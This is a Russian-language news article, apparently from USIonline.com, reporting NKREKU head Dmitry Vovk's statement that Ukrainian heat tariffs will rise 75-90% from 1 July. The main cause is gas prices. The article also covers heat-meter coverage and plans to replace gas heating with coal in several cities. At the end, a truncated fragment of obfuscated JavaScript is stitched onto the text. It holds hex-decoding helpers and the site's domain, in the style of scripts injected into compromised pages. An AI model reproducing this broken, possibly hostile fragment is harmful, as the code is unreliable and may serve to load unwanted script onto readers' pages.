Тарифы на тепло c 1 июля повысятся на 75-90% «фото»

Тарифы на тепло c 1 июля повысятся на 75-90%

 

теплоснабжениеОб этом председатель НКРЭКУ Дмитрий Вовк сообщил порталу LB.ua, передает корреспондент Украинской Службы Информации

Львиная доля корректировки (порядка 90%) связана с решением Кабинета Министров по цене на газ, остальное – пересмотр заработных плат в соответствии с новым уровнем минимальных зарплат и уровнем единого социального взноса, изменение розничных тарифов на электроэнергию, другое, – заявил он.

Повышение тарифов назначено на 1 июля.

Вовк сообщил, что по состоянию на 1 апреля процент оборудования жилфонда приборами учета тепла достигает порядка 60%. К 1 января этот показатель должен увеличиться до 86%.

Почему не 100%? Потому что ряд предприятий не подают инвестиционные программы, в которых будет коммерческий учет газа, – отметил Вовк.

Глава НКРЭКУ добавил, что регулятор прорабатывает комплекс мероприятий, который позволит в будущем снизить тарифы на тепло.

Комиссия проводит работу по замещению тепла с природного газа на тепло из угля там, где это возможно – среди таких городов Киев, Чернигов, Черкассы, Сумы, Калуш. Краткосрочные мероприятия по “расшивке” узких мест по генерации и передаче тепловой энергии из угля позволят снизить средневзвешенную цену для этих городов, – отметил Вовк.

Как сообщала USIonline.com, первомайский «подарок» от Гройсмана: одесситов ждут новые газовые тарифы.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "usionline.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e